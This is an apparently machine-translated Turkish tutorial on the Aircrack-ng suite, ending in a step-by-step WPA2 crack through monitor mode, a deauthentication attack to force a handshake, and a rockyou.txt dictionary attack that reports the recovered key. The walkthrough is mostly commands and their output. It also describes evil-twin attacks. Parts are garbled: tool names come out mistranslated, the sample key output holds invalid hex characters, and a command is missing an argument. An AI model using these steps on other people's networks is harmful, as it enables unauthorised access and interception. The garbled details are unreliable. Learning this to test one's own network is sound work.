hava çatlağı

Aircrack-ng Nasıl Kullanılır

Aircrack-ng Nasıl Kullanılır
Çoğu zaman insanlar bağlı oldukları ağı hiç düşünmezler. Bu ağın ne kadar güvenli olduğunu ve günlük olarak gizli verilerini ne kadar riske attıklarını asla düşünmezler. adlı çok güçlü bir araç kullanarak wifi ağlarınızda güvenlik açığı kontrolleri yapabilirsiniz Aircrack-ng ve Wireshark. Wireshark, ağ etkinliğini izlemek için kullanılır. Aircrack-ng daha çok, Kablosuz bağlantılara erişim sağlamanıza izin veren agresif bir araç gibidir. Davetsiz misafir olarak düşünmek, kendinizi bir saldırıya karşı korumanın her zaman en güvenli yolu olmuştur. Bir davetsiz misafirin sisteminize erişim elde etmek için yapacağı eylemleri, hava korsanlığı hakkında bilgi edinerek tam olarak kavrayabilirsiniz. Daha sonra güvensiz olmadığından emin olmak için kendi sisteminizde uyumluluk kontrolleri yapabilirsiniz.

Aircrack-ng WiFi ağ güvenliğini test etmek için tasarlanmış eksiksiz bir yazılım setidir. Sadece tek bir araç değil, her biri belirli bir amaca hizmet eden bir araçlar topluluğudur. Erişim Noktasını izlemek, test etmek, ağa saldırmak, wifi ağını kırmak ve test etmek gibi farklı wifi güvenliği alanları üzerinde çalışılabilir. Aircrack'in temel amacı, paketleri engellemek ve şifreleri kırmak için karmaları deşifre etmektir. Neredeyse tüm yeni kablosuz arayüzleri destekler. Aircrack-ng eski bir araç takımı olan Aircrack'in geliştirilmiş bir versiyonudur Yeni nesil. Daha büyük bir görevi üstlenmek için birlikte çalışan harika araçlardan bazıları.

Airmon-ng:

Airmon-ng, ağ arayüz kartını monitör moduna yerleştiren aircrack-ng kitine dahildir. Ağ kartları genellikle yalnızca NIC'nin MAC adresi tarafından tanımlandığı şekilde kendileri için hedeflenen paketleri kabul eder, ancak airmon-ng ile, onlar için hedeflenmiş olsun ya da olmasın tüm kablosuz paketler de kabul edilecektir. Erişim noktasıyla bağlantı kurmadan veya kimlik doğrulaması yapmadan bu paketleri yakalayabilmelisiniz. Ağ arayüzünü monitör moduna alarak bir Erişim Noktasının durumunu kontrol etmek için kullanılır. Öncelikle kablosuz kartları monitör modunu açacak şekilde yapılandırmalı, ardından herhangi bir işlemin buna müdahale ettiğini düşünüyorsanız, tüm arka plan işlemlerini sonlandırmalısınız. İşlemler sonlandırıldıktan sonra kablosuz arayüz üzerinde aşağıdaki komut çalıştırılarak monitör modu etkinleştirilebilir:

[e-posta korumalı]:~$ sudo airmon-ng start wlan0 #

Aşağıdaki komutu kullanarak herhangi bir zamanda airmon-ng'ı durdurarak monitör modunu devre dışı bırakabilirsiniz:

[e-posta korumalı]:~$ sudo airmon-ng stop wlan0 #

Airodump-ng:

Airodump-ng, bizi çevreleyen tüm ağları listelemek ve onlar hakkında değerli bilgileri görüntülemek için kullanılır. Airodump-ng'nin temel işlevi paketleri koklamaktır, bu nedenle esasen monitör moduna alınırken etrafımızdaki tüm paketleri almak için programlanmıştır. Etrafımızdaki tüm bağlantılarda çalıştıracağız ve ağa bağlı istemci sayısı, bunlara karşılık gelen mac adresleri, şifreleme stili ve kanal adları gibi verileri toplayacağız ve ardından hedef ağımızı hedeflemeye başlayacağız.

airodump-ng komutunu yazıp parametre olarak ağ arayüz adını vererek bu aracı aktif hale getirebiliriz. Tüm erişim noktalarını, veri paketlerinin miktarını, kullanılan şifreleme ve kimlik doğrulama yöntemlerini ve ağın adını (ESSID) listeleyecektir. Bilgisayar korsanlığı açısından mac adresleri en önemli alanlardır.

[e-posta korumalı]:~$ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack şifre kırmak için kullanılıyor. Tüm paketleri airodump kullanarak yakaladıktan sonra aircrack ile anahtarı kırabiliriz. PTW ve FMS olmak üzere iki yöntemi kullanarak bu anahtarları kırar. PTW yaklaşımı iki aşamada yapılır. İlk başta, yalnızca ARP paketleri kullanılır ve ancak o zaman, aramadan sonra anahtar kırılmazsa, yakalanan diğer tüm paketleri kullanır. PTW yaklaşımının bir artı noktası, tüm paketlerin çatlama için kullanılmamasıdır. İkinci yaklaşımda, ben.e., FMS, anahtarı kırmak için hem istatistiksel modelleri hem de kaba kuvvet algoritmalarını kullanıyoruz. Bir sözlük yöntemi de kullanılabilir.

Aireplay-ng:

Airplay-ng, trafik oluşturmak veya hızlandırmak için paketleri kablosuz bir ağa sunar. İki farklı kaynaktan gelen paketler aireplay-ng ile yakalanabilir. Birincisi canlı ağ, ikincisi ise zaten var olan pcap dosyasındaki paketler. Airplay-ng, bir kablosuz erişim noktasını ve bir kullanıcıyı hedef alan bir kimlik doğrulama saldırısı sırasında kullanışlıdır. Ayrıca, müşterinin sisteminden bir anahtar almanızı sağlayan bir araç olan airplay-ng ile kahve latte saldırısı gibi bazı saldırılar gerçekleştirebilirsiniz.  Bunu, bir ARP paketini yakalayarak ve ardından onu manipüle ederek ve sisteme geri göndererek başarabilirsiniz. İstemci daha sonra airodump tarafından yakalanabilen bir paket oluşturacak ve aircrack bu değiştirilmiş paketten anahtarı kıracaktır. Airplay-ng'nin diğer bazı saldırı seçenekleri arasında chopchop, fragman arepreplay, vb.

Hava Üssü-ng:

Airbase-ng, davetsiz misafirin bilgisayarını, başkalarının bağlantı kurması için güvenliği ihlal edilmiş bir bağlantı noktasına dönüştürmek için kullanılır. Airbase-ng'yi kullanarak yasal bir erişim noktası olduğunuzu iddia edebilir ve ağınıza bağlı bilgisayarlara ortadaki adam saldırıları gerçekleştirebilirsiniz. Bu tür saldırılara Evil Twin Attacks denir. Temel kullanıcıların yasal erişim noktası ile sahte erişim noktası arasında ayrım yapması imkansızdır. Yani, şeytani ikiz tehdidi, bugün karşılaştığımız en tehditkar kablosuz tehditler arasında yer alıyor.

Airolib-ng:

Airolib, şifre listelerini ve erişim noktasını depolayıp yöneterek bilgisayar korsanlığı sürecini hızlandırır. Bu program tarafından kullanılan veritabanı yönetim sistemi, çoğunlukla tüm platformlarda bulunan SQLite3'tür. Parola kırma, özel geçici anahtarın (PTK) ayıklandığı ikili ana anahtarın hesaplanmasını içerir. PTK'yı kullanarak, belirli bir paket için çerçeve mesajı tanımlama kodunu (MIC) belirleyebilir ve teorik olarak MIC'nin pakete benzer olduğunu bulabilirsiniz, bu nedenle PTK doğruysa PMK da haklıydı.

Veritabanında depolanan parola listelerini ve erişim ağlarını görmek için aşağıdaki komutu yazın:

[e-posta korumalı]:~$ sudo airolib-ng testdatabase -stats

Burada testdatabase, erişmek veya oluşturmak istediğiniz db'dir ve -stats, üzerinde gerçekleştirmek istediğiniz işlemdir. Bazı SSID'lere veya başka bir şeye maksimum öncelik vermek gibi, veritabanı alanlarında birden çok işlem yapabilirsiniz. airolib-ng'yi aircrack-ng ile kullanmak için aşağıdaki komutu girin:

[e-posta korumalı]:~$ sudo aircrack-ng  -r testdatabase wpa2.eapol.kap

Burada önceden hesaplanmış PMK'ları kullanıyoruz test veritabanı şifre kırma sürecini hızlandırmak için.

Aircrack-ng kullanarak WPA/WPA2 kırma:

Haydi, aircrack-ng'nin birkaç harika aracının yardımıyla neler yapabileceğine dair küçük bir örneğe bakalım.  Sözlük yöntemi kullanarak bir WPA/WPA2 ağının önceden paylaşılan anahtarını kıracağız.

Yapmamız gereken ilk şey, monitör modunu destekleyen ağ arayüzlerini listelemek. Bu, aşağıdaki komut kullanılarak yapılabilir:

[e-posta korumalı]:~$ sudo airmon-ng
PHY    Arayüz                  Sürücü         Chipset
Phy0   wlx0                       rtl8xxxu       Realtek Semiconductor Corp.

Bir arayüz görebiliriz; şimdi bulduğumuz ağ arayüzünü ( wlx0 ) aşağıdaki komutu kullanarak monitör moduna almamız gerekiyor:

[e-posta korumalı]:~$ sudo airmon-ng start wlx0

adlı arayüzde monitör modunu etkinleştirdi wlx0mon.

Şimdi monitör moduna aldığımız ağ arayüzümüz üzerinden yakındaki yönlendiricilerin yayınlarını dinlemeye başlamalıyız.

[e-posta korumalı]:~$ sudo airodump-ng wlx0mon
CH  5 ][ Geçen: 30 sn ][ 2020-12-02 00:17
 
BSSID              PWR  İşaretçiler    #Veri, #/s  CH  MB   ENC  ŞİFRE DOĞRULAMA ESSID
 
E4:6F:13:04:CE:31  -45       62       27    0   1  54e  WPA2 CCMP   PSK  CrackIt
C4:E9:84:76:10:BE  -63       77        0    0   6  54e. WPA2 CCMP   PSK  Hackme
C8:3A:35:A0:4E:01  -63       84        0    0   8  54e  WPA2 CCMP   PSK  Net07
74:DA:88:FA:38:02  -68       28        2    0  11  54e  WPA2 CCMP   PSK  TP-Link_3802
 
BSSID              İSTASYON            PWR   Hız    Kayıp    Çerçeveler  Probu
 
E4:6F:13:04:CE:31  5C:3A:45:D7:EA:8B   -3    0 - 1e     8        5
E4:6F:13:04:CE:31  D4:67:D3:C2:CD:D7  -33    1e- 6e     0        3
E4:6F:13:04:CE:31  5C:C3:07:56:61:EF  -35    0 - 1      0        6
E4:6F:13:04:CE:31  BC:91:B5:F8:7E:D5  -39    0e- 1   1002       13 

Hedef ağımız kraker bu durumda, şu anda kanal 1'de çalışan.

Burada hedef ağın şifresini kırmak için, bir cihaz bir ağa bağlanmaya çalıştığında meydana gelen 4 yönlü bir el sıkışma yakalamamız gerekiyor. Aşağıdaki komutu kullanarak onu yakalayabiliriz:

[e-posta korumalı]:~$ sudo airodump-ng -c 1 --bssid  E4:6F:13:04:CE:31 -w /home wlx0

-c         : Kanal

-bssid: Hedef ağın Bssid'si

-w        : pcap dosyasının yerleştirileceği dizinin adı

Şimdi bir cihazın ağa bağlanmasını beklememiz gerekiyor, ancak bir el sıkışmasını yakalamanın daha iyi bir yolu var. Aşağıdaki komutu kullanarak bir deauthentication saldırısı kullanarak cihazların AP'ye yetkilerini devre dışı bırakabiliriz:

[e-posta korumalı]:~$ sudo aireplay-ng -0 -a E4:6F:13:04:CE:31

bir:    Hedef ağın Bssid'si

-0:   kimlik doğrulama saldırısı

Tüm cihazların bağlantısını kestik ve şimdi bir cihazın ağa bağlanmasını beklememiz gerekiyor.

CH  1 ][ Geçen: 30 sn ][ 2020-12-02 00:02 ][ WPA anlaşması: E4:6F:13:04:CE:31
 
BSSID              PWR RXQ  İşaretçiler    #Veri, #/s  CH  MB   ENC  ŞİFRE YETKİLENDİRME
 
E4:6F:13:04:CE:31  -47   1      228      807   36   1  54e  WPA2 CCMP   PSK  P
 
BSSID              İSTASYON            PWR   Hız    Kayıp    Çerçeveler  Probu
 
E4:6F:13:04:CE:31  BC:91:B5:F8:7E:D5  -35    0 - 1      0        1
E4:6F:13:04:CE:31  5C:3A:45:D7:EA:8B  -29    0e- 1e     0       22
E4:6F:13:04:CE:31  88:28:B3:30:27:7E  -31    0e- 1      0       32
E4:6F:13:04:CE:31  D4:67:D3:C2:CD:D7  -35    0e- 6e   263      708  CrackIt
E4:6F:13:04:CE:31  D4:6A:6A:99:ED:E3  -35    0e- 0e     0       86
E4:6F:13:04:CE:31  5C:C3:07:56:61:EF  -37    0 - 1e     0        1            

Bir vuruş aldık ve saatin hemen yanında sağ üst köşeye baktığımızda bir el sıkışmanın yakalandığını görebiliyoruz. Şimdi belirtilen klasöre bakın ( /ev bizim durumumuzda ) bir “.pcap" dosya.

WPA anahtarını kırmak için aşağıdaki komutu kullanabiliriz:

[e-posta korumalı]:~$ sudo aircrack-ng -a2 -w rockyou.txt -b  E4:6F:13:04:CE:31 el sıkışma.kap
b                          :Hedef ağın Bssid'si
-a2                      :WPA2 modu
Rockyou.txt:       Kullanılan sözlük dosyası
Tokalaşma.cap: Yakalanan el sıkışmasını içeren dosya
Aircrack-ng 1.2 beta3
[00:01:49] 10566 anahtar test edildi (1017.96 k/sn)
ANAHTAR BULUNDU! [ beni yakaladın ]
Ana Anahtar :   8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Geçici Anahtar : 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC:  CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

Hedef ağımızın anahtarı başarıyla kırıldı.

Sonuç:

Akıllı telefon kullanan işçilerden endüstriyel kontrol cihazlarına kadar her şirket tarafından kullanılan kablosuz ağlar her yerdedir. Araştırmaya göre 2021'de internet trafiğinin neredeyse yüzde 50'sinden fazlası WiFi üzerinden olacak.  Kablosuz ağların pek çok avantajı vardır, kapıların dışında iletişim, kablo döşemenin neredeyse imkansız olduğu yerlerde hızlı internet erişimi, başka bir kullanıcı için kablo döşemeden ağı genişletebilir ve mobil cihazlarınızı evinizdeyken kolayca ev ofislerinize bağlayabilirsiniz. orada değil.

Bu avantajlara rağmen, gizliliğiniz ve güvenliğiniz hakkında büyük bir soru işareti var. Bu ağlar olarak; İletim aralığındaki yönlendiriciler herkese açıktır, kolayca saldırıya uğrayabilir ve verileriniz kolayca tehlikeye girebilir. Örneğin, halka açık bir kablosuz ağa bağlıysanız, bu ağa bağlı herhangi biri, bir miktar istihbarat ve mevcut harika araçların yardımıyla ağ trafiğinizi kolayca kontrol edebilir ve hatta onu boşaltabilir.

OpenTTD Tutorial
OpenTTD is one of the most popular business simulation games out there. In this game, you need to create a wonderful transportation business. However,...
SuperTuxKart for Linux
SuperTuxKart is a great title designed to bring you the Mario Kart experience free of charge on your Linux system. It is pretty challenging and fun to...
Battle for Wesnoth Tutorial
The Battle for Wesnoth is one of the most popular open source strategy games that you can play at this time. Not only has this game been in developmen...